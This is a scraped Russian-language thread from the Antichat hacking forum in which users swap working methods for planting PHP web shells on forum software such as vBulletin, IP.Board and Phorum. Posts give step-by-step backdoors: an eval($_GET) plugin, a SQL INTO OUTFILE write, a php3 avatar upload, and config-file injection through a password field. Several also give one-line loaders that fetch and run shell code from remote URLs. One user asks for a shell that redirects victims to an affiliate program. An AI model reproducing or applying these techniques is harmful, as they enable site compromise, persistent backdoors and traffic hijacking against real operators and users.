ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости CMS / форумов (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   [Заливка шелла в Форуме] (https://forum.antichat.xyz/showthread.php?t=76949)

InFlame 26.08.2009 11:24

Как залить шелл в vBulletin 3.8.1? Линки в первом посту нерабочие.

Pashkela 26.08.2009 15:13

Код:

1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: faq_complete
Код: eval($_GET[e]);

потом шлепаем на http://site.ru/forum/faq.php?e=phpinfo();
льем шелл, возвращаемся в админку, удаляем модуль faq_complete

Explоit 15.09.2009 07:59

в булке 3.5.1 у меня нет прав на модули и редактирование прав. ПОдскажите можно ли канибудь через стили залить или другое.

-=void=- 18.09.2009 13:40

Цитата:

Сообщение от Pashkela
Код:

1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: faq_complete
Код: eval($_GET[e]);

потом шлепаем на http://site.ru/forum/faq.php?e=phpinfo();
льем шелл, возвращаемся в админку, удаляем модуль faq_complete

А как лить шелл ? дайте приблизительную команду у меня phpinfo видит на остальные команды даже внимание обращать не хочет ((((

NeKit 19.12.2009 01:26

Как можно загрузить шелл на IPB 3? Имеется доступ в админку. Способы IPB 2 к несчастью использовать не получается.

.:[melkiy]:. 19.12.2009 02:09

Цитата:

Сообщение от -=void=-
А как лить шелл ? дайте приблизительную команду у меня phpinfo видит на остальные команды даже внимание обращать не хочет ((((

мб винда? а ты пишешь комманды никса... попробуй весь код шелла вписать вместо eval`a , но без <? ?> потом уже загрузить шелл в какуе-то папку (которая доступна для записи)

Pashkela 19.12.2009 03:23

Цитата:

Сообщение от NeKit
Как можно загрузить шелл на IPB 3? Имеется доступ в админку. Способы IPB 2 к несчастью использовать не получается.

можно так попробовать:

вариант1:

Поддержка->Управление SQL->Выполняющиеся процессы->Выполнить новый запрос

select 0x3c3f706870696e666f28293b3f3e into outfile 'Z:/home/site.ru/www/uploads/shell.php'

полный путь можно посмотреть так:

->Поддержка, там будет сверху написана версия PHP и слева ссылка на PHP INFO

Тестилось на IBP 3.0.1 nulled

шелл: http://site.ru/uploads/shell.php

PS: Нужны соответствующие права

вариант2:

Форумы->Прикрепляемые файлы->Типы файлов

жмем "Добавить новый тип"->"Использовать какой-нибудь тип как базовый?" - выбираем "Основан на типе php"->"Расширение прикрепляемого файла" - php3 (просто php есть в списке по умолчанию и при загрузке автоматически переименовывается в .txt)->"MIME-тип файла" - image/gif->"Разрешить использовать этот тип файлов, как аватар или фотографию?" - да.

Топаем в свой профиль:

http://site.ru/index.php?app=core&module=usercp&tab=members&area= avatar

грузим аву-шелл с расширением php3 и получаем шелл по адресу:

http://site.ru/uploads/av-1.php3

MaKaKaZ 22.12.2009 20:22

Просто возьми готовый шел: http://autospanner.ru/menu/groovie.rar

.:[melkiy]:. 24.12.2009 18:49

Подскажите как залить шелл через админку FUDforum 2.7.6 :confused:

Здесь не густо :(

Lexeon 05.02.2010 01:38

Есть IP.Board 2.3.6 , через шаблоны шелл залить не получается так как закрыты все папки для записи. Есть также все админы в том числе и самый первый. раньше с помощью него в настройках исполнял команду
$data=implode('',file('http://ssilka/do/shella/c99.txt'));
$fp=fopen('./shell.php','wb');
fputs($fp,$data);
fclose($fp);

Нормально было шел заливался. Но сейчас так не делается и шела нету. В чем может быть проблема, как её обойти, и какие ещё могут быть способы?
Заранее спс

daniel_1024 20.03.2010 20:22

есть способы заливки шелла для форума vBulletin 3.8.0 Beta 3 ?!

Рамос 22.04.2010 02:49

в smf можно сменить директорию в которую заливаются темы ? :(

frost444 01.05.2010 19:29

как залить шелл на TorrentPier ??

tmp 15.05.2010 13:14

Кто знает еще какие то способы заливки шелла на ipb 2.3.4 ? Через импорт изображения - не проходит - вернее шелл загружен но видимо в директории запрещено выполнение скриптов, вываливается ошибка 500 Internal Server Error, через аватару тоже не проходит - и тип файла добавил и разрешение в аватаре на этот тип добавил, но все равно не загружает.
Заранее спасибо

Cherep 07.06.2010 20:02

такой вопрос, залил шелл на IPB NULL, пытаюсь войти и выдаёт 500 Internal Server Error. В чем может быть проблема? Точнее как залить шелл не через стили

Внучёк 18.10.2010 04:11

Отлично Пашкела в + 4 из 3 в держки по думаю в чем косяк, но все же

b3 30.03.2011 06:09

Версия: phorum-3.4.6

Цитата:

Сообщение от None
Copyright (C) 2000 Phorum Development Team
http://www.phorum.org

Зависимости: Нужны права админа.

Наткнулся совершенно случайно, версия оч старая, нагуглил архив, скал, стал изучать исходники, и почти сразу наткнулся на то что конфигурация форума сохраняется в PHP файл:

Код:

C:\wamp\www\phorum-3.4.6\phorum-3.4.6\admin\settings\forums.php
Что дает нам возможность внедрить в конфиги пару своих строк =)

Последние строки в конфиг файле:

PHP код:

[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]// database variables

[/COLOR][COLOR="#0000BB"]$PHORUM[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DatabaseServer'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$PHORUM[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DatabaseName'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$PHORUM[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DatabaseUser'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$PHORUM[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DatabasePassword'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR] 

Чтоб не нарушить структуру файла, идем в раздел Конфигурации БД:

Код:

http://www.SITE.COM/forum/admin/index.php?page=db
В поле Password: дописываем к текущему паролю строку:

Код:

'; @eval(stripslashes($_GET['cmd'])); echo '
И получаем бэкдор по пути:

Код:

http://www.SITE.COM/forum/admin/settings/forums.php

Cherep 18.07.2011 23:48

пробывал залить шелл способом пашкеллы. phpinfo показывает, но погда уже прописываю /faq.php?e=wget линк на шелл

пишет

Код:

Parse error: syntax error, unexpected T_STRING in
public_html/faq.php(324) : eval()'d code(1) : eval()'d code on line 1

код в модуле

Код:

eval($_GET[e]);

tack3r 19.07.2011 17:59

Цитата:

Сообщение от Pashkela
Код:

1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: faq_complete
Код: eval($_GET[e]);

потом шлепаем на http://site.ru/forum/faq.php?e=phpinfo();
льем шелл, возвращаемся в админку, удаляем модуль faq_complete

все сделал , захожу http://site.ru/forum/faq.php?e=phpinfo();

а где тут загружать шелл найти не могу. Помогите кто сталкивался

plaeer 19.07.2011 18:27

Цитата:

Сообщение от tack3r
все сделал , захожу http://site.ru/forum/faq.php?e=phpinfo();
а где тут загружать шелл найти не могу. Помогите кто сталкивался

Это просто проверка рабоспособности бэкдора, чтобы получить полноценный шелл нужно взять любой шелл и залить его в txt формате в коде убрать в начале После вместо phpinfo(); вставляем

eval(file_get_contents('http://site.com/shell.txt'));

nikotin49 08.11.2011 17:26

Подскажите пожалуйста как залить php шелл на vbulletin 3.xx - 4.xx очень нужно

nikotin49 08.11.2011 17:58

Цитата:

Сообщение от plaeer
Это просто проверка рабоспособности бэкдора, чтобы получить полноценный шелл нужно взять любой шелл и залить его в txt формате в коде убрать в начале После вместо phpinfo(); вставляем
eval(file_get_contents('http://site.com/shell.txt'));

Попробывал данный способ нечего не вышло(( показывает что маркер безопастности отсутствует после ввода пароля входа в шелл

попугай 08.11.2011 18:22

Цитата:

Сообщение от nikotin49
Попробывал данный способ нечего не вышло(( показывает что маркер безопастности отсутствует после ввода пароля входа в шелл

Просто шелл залей сразу

nikotin49 08.11.2011 18:24

Не понял вас. всысле залить шелл сразу?

попугай 08.11.2011 18:45

Цитата:

Сообщение от nikotin49
Не понял вас. всысле залить шелл сразу?

веб-шелл на сервер залей

nikotin49 08.11.2011 19:09

Ага, если было бы всё так просто. имею доступ только к админке.

попугай 08.11.2011 19:46

Цитата:

Сообщение от nikotin49
Ага, если было бы всё так просто. имею доступ только к админке.

ты же писал, что

Цитата:

Сообщение от None
после ввода пароля входа в шелл

значит ты заливал шелл.

nikotin49 08.11.2011 20:57

Заливал я на свой хостинг. как написанно в инструкции выше. лан спасибо за помощь. Все уже получилось при помощи, Google and English hack forums

boortyhuhtyu 03.12.2011 16:47

ктонить помогите такая хрень вылетает при заливке через шаблон :ipb 2.3.4

"Admin CP Message

There was no content in the file to process"

типа нету ничё(

я так понял ето chmod стоит на ету дерикторию

A_n_d_r_e_i 04.12.2011 00:40

Цитата:

Сообщение от boortyhuhtyu
ктонить помогите такая хрень вылетает при заливке через шаблон :ipb 2.3.4
"Admin CP Message
There was no content in the file to process"
типа нету ничё(
я так понял ето chmod стоит на ету дерикторию

[QUOTE="None"]
1.go to acp
2.click on the Tools & Settings tab
3.then click on General Configuration
4.after that browse down and look for " find Upload URL" ( here write the right url)
5.and then find this "Path to 'upload' directory" and once again write the right path.
6.ok now save the settings and try to upload a skin.
p.s
if you dont knw the right url for the step 4 and 5, they are written under the description of the title . for example:
Upload URL:
The URL to your "uploads" folder.

boortyhuhtyu 04.12.2011 01:07

короче всё получилось скин залился тока теперь ещё один проблемс, Internal Server Error

boortyhuhtyu 04.12.2011 03:25


mixer123 05.12.2011 01:49

Здравствуйте.Подскажите.У меня такая ситуация:Есть приличное кол-во сайтов с sql уязвимостями.Так вот,если можно приведите пример шелла,чтобы после заливки он редиректил сразу пользователей на нужную мне партнёрку.Спасибо заранее.

wkar 05.12.2011 15:35

Есть доступ в админку Powered by phpBB 2.0.21 , Восстановление бд не работает, это не работает /showpost.php?p=198446&postcount=3 , есть еще что-то ?

DronS 14.03.2012 18:45

vBulletin 4.1.3, админка есть, eval() прикрутил в модулях, пытаюсь лить шелл, а он мне:

Код:

Warning: file_get_contents() [function.file-get-contents]: http:// wrapper is disabled in the server configuration by allow_url_fopen=0 in [path]/faq.php(324) : eval()'d code(1) : eval()'d code on line 1
потом в пыхинфо разглядел allow_url_fopen - Off, как я понял, это запрещает открытие файлов по урл, можно только локальные...

Есть еще какие способы?

Может можно какой файл с внедренным шеллом залить штатными методами, а потом строки вырвать уже локально?

OxoTnik 14.03.2012 18:49

Цитата:

Сообщение от DronS
vBulletin 4.1.3, админка есть, eval() прикрутил в модулях, пытаюсь лить шелл, а он мне:
Код:

Warning: file_get_contents() [function.file-get-contents]: http:// wrapper is disabled in the server configuration by allow_url_fopen=0 in [path]/faq.php(324) : eval()'d code(1) : eval()'d code on line 1
потом в пыхинфо разглядел allow_url_fopen - Off, как я понял, это запрещает открытие файлов по урл, можно только локальные...
Есть еще какие способы?
Может можно какой файл с внедренным шеллом залить штатными методами, а потом строки вырвать уже локально?

Попробуй в /tmp/ залить будет ошибка?

Ereee 14.03.2012 18:54

DronS,

простой загрузчик внедри в faq.php или сразу код запакованного WSO без

faza02 14.03.2012 18:57

угу, или же залей новый смайл с кодом шелла и проикнлудь

DronS 14.03.2012 19:01

Цитата:

Сообщение от OxoTnik
Попробуй в /tmp/ залить будет ошибка?

да не, такой ошибки у меня нет

Код:

Warning: file_put_contents(/блаблабла.php) [function.file-put-contents]: failed to open stream: Permission denied in [path]/faq.php(324) : eval()'d code(1) : eval()'d code on line 1
следовательно, права на запись имеются.

Но запрет открытия по урл это не решает.

DronS 14.03.2012 19:10

Цитата:

Сообщение от Ereee
DronS
,
простой загрузчик внедри в faq.php или сразу код запакованного WSO без

ок, попробую


Время: 17:49